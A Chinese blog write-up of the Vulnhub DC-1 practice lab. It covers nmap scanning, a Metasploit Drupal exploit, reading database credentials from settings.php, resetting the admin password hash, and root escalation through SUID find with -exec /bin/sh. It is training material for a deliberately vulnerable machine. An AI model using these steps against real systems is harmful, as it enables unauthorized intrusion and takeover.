靶机DC-1攻略

已于 2022-10-07 20:03:37 修改
阅读量1.1k 收藏 3
点赞数 9
文章标签: 网络 安全
于 2022-10-07 19:59:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43179779/article/details/127198110
版权

靶机DC-1攻略

  • 实验环境搭建

1.1、所需工具

1.1.1、vbox:用于虚拟环境搭建

1.1.2、Kali操作系统:攻击机

1.1.3、DC-1:攻击目标靶机

1.2、环境配置

1.2.1网络配置:网络均采用桥接模式保证网络在同一个段

Kali的IP为:192.168.1.6

DC-1的IP未知需要自己获取

  • 渗透步骤

2.1信息收集

2.1.1获取目标IP

DC-1的IP是未知的使用nmap -sP 来获取

分析可知DC-1的IP为192.168.1.7

得知IP后使用nmap -A查看靶机开启的端口

 一共开启三个端口ssh、http和111,可以先尝试访问http

可以使用whatweb -v 192.168.1.7分析平台架构获取平台信息

2.2漏洞查询

2.2.1进入msfconsole

2.2.2使用search Drupa查找对应的漏洞模块

2.2.3找到可利用点

2.2.4 利用use使用的漏洞

2.2.5使用show options 检查利用漏洞所需要的配置

2.3开始进行渗透测试

2.3.1 使用set RHOSTS建立攻击机和靶机之间的联系

2.3.2 使用exploit启动链接

2.3.3 使用sysinfo查看DC-1的基本信息

2.3.4 获得shell

2.3.5为了方便查看使用python进行反弹python -c 'import pty;pty.spawn("/bin/bash")'

3.1获取flag

3.1.1cat flag1.txt(小彩蛋)*每个好的CMS都需要一个配置文件-你也是。*

3.1.2查看配置文件cat ./sites/default/settings.php

3.1.3利用查找到的数据库文件尝试登录

3.1.4成功登录对方数据库后查看对方数据库

3.1.5进入到数据库中

3.1.6查看表show tables;(发现users表)

3.1.7查看表中内容select * from users\G;

3.1.8admin的密码给加密,需要找到加密文件find . -name “*hash*”并且运行该文件./scripts/password-hash.sh

直接再后面加密码就会返回加密后的结果

3.1.9简单测试是否能修改./scripts/password-hash.sh 123456

3.1.10在web界面查看是否修改成功

4.1使用SUID提权

4.1.1查看初始权限(whoami)

4.1.2使用find / -name cron.php -exec "/bin/sh" \;提权

5.1获取最终权限

5.1.1进入root 查看文件

5.1.2获取最终flag

6总结

1.nmap,arp-scan使用

2.whatweb 指纹识别

3.msf使用对应的模块

4.mysql的修改数据

5.SUID提权

要腹肌的仓鼠
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
靶机DC-1 WP
m0_66638011的博客
05-11 1403
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
【Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 413
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
网络安全最全DC系列靶机1通关教程_dc1 靶机,2024年来看看网络安全的发展
最新发布
2401_84253089的博客
05-14 963
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2871
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC-1靶机,初级渗透详细教程
2302_79546589的博客
11-24 1274
根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径是Sites/default/settings.php,我们可以用命令直接搜索并打开,内联执行。这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123。密码加密了,像登录就不太好登陆了,我们可以修改一下admin的密码。看到漏洞还是挺多的,我们用等级比较高,也比较新的18年的漏洞。find比较常用,可以执行root权限的命令找查文件,
DC1-靶机详解
TonyChaoWei的博客
02-06 1743
DC系列靶机渗透实战 提权
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC系列】DC-1靶机实战详细讲解
weixin_44681307的博客
06-27 166
Dc-1靶机突破方法
DC-1靶场
2301_76690905的博客
12-01 66
下载后解压成.ova格式,虚拟机上直接打开这个.ova就行,kali和靶机都调成NET模式因为攻击机和靶机同在局域网使用内网扫描:Nmap扫靶机ip:-v:该选项表示在扫描期间显示详细的输出信息,使您能够更好地了解扫描进度和结果。-A:这是一个组合选项,用于启用一系列高级扫描技术和功能,以便获得更全面的目标主机信息。-A 选项将同时启用以下子选项:主机发现(Host Discovery):尝试确定目标 IP 地址是否可达。
DC系列靶机DC-1
weixin_53067829的博客
07-01 975
DC系列靶机
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 166
DC-1详解
DC-1靶场渗透实验
Alashan12的博客
05-05 1910
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2203
DC系列目前总共有9个靶机,本次靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC靶场系列--DC1
BGiscool的博客
06-28 4818
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值